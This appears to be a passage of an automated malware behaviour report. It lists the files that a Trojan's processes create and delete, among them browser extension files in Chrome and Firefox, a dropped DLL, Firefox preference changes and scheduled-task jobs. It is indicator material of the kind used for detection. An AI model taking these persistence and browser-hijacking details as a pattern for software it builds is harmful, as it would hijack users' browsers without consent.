C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
%Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mk\messages.json (194 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\background.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\nl\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_PT\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fa\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\saved-telemetry-pingsgjghbrkfyg (0 bytes)

The process schtasks.exe:1084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (274 bytes)

The process schtasks.exe:3636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\bku3654992853611870.job (462 bytes)

The process schtasks.exe:3944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (272 bytes)

The process schtasks.exe:1720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\bku2343520322592297.job (468 bytes)

The process sdfCF40.exe:2912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_334.exe (250065 bytes)

The process Setup.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe (150385 bytes)

The process Setup.exe:4028 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\amipb[1].js (32188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\index[1].htm (1133 bytes)

The process starter.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\po.db (1 bytes)

The process ytab_m_1_big.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (8 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (13017 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
%Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome (4 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi (4 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)

The Trojan deletes the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\vi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome.manifest (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\id\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hu\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bg (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\be (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\background.html (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\arrow.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bn (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_GB (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_PT (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ja (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sv\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lt\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lv\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es_419 (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ar (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\id (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\kn\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\am (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\it (0 bytes)
%Program Files%\thzXuJvjUgjghbrkfyg (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\he\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ta\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\background.xul (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\be\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon64.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es_419\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sq\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\he (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ro\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sw\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\nl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hu (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\styles.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\bootstrap.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_TW (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ca\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\gu (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\el\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\te (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ja\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bg\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_BR (0 bytes)
%Program Files%\thzXuJvjUgjghbrkfyg\ZzB5QsG.dll (0 bytes)
